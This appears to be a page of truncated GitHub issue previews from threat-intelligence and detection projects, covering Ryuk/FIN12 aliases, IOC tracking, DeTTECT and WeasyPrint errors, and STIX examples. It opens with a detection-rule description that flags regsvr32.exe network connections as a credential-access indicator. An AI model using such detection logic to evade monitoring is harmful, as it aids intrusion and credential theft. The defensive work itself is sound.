-
## Description
`regsvr32.exe` making external network connections, as well as regsvr32.exe execution without command-line options, can help detect credential access.
This rule will detect when `re…
-
UNC1878/TEMP.MixMaster (FireEye)
White Magician (PwC)
FIN12 (Mandiant)
ITG23 (IBM)
Team9 (NCC Group)
-
The following issue aims to run the specified test for the current release candidate, report the results, and open new issues for any encountered errors.
## Modules tests information
|||
|-------…
-
This is the error I get when trying to run 'python dettect.py generic -ds'
```
Traceback (most recent call last):
File "dettect.py", line 353, in
_menu(_init_menu())
File "dettect.py",…
-
Run on ubuntu 20.04 using weasy 53.3:
```
from weasyprint import HTML
HTML('https://www.darkreading.com/attacks-breaches/rapid-ryuk-ransomware-attack-group-christened-as-fin12').write_pdf('test.p…
-
The following issue aims to run the specified test for the current release candidate, report the results, and open new issues for any encountered errors.
## Modules tests information
|||
|-------…
-
Hello,
do you know where I can try more examples to load and try?
I found these STIX 2.1 Threat Reports
https://oasis-open.github.io/cti-documentation/examples/example_json/apt1.json
https://oasis…
-
As an example I have probably investigated 50-100 Ryuk ransomware attacks now, each one we get new IOCs as well as see a lot of the old ones again. Having to remember what IOCs to look for seems mad. …
-
Based off my idea in #42; tested by @pallebone.
```bash
jq -rj 'to_entries[] | select(.value.color == "black") | .value.mirrors | join (" "), " "'
```
Make a release step to print `mirrors[0]` f…
-
Hi, as I told you, here's my list on Ryuk/Bazar/Trickbot
Choose what you want to add to yours.
Thanks for your work, David and much thanks to all the companies / individuals sharing intel on these.
…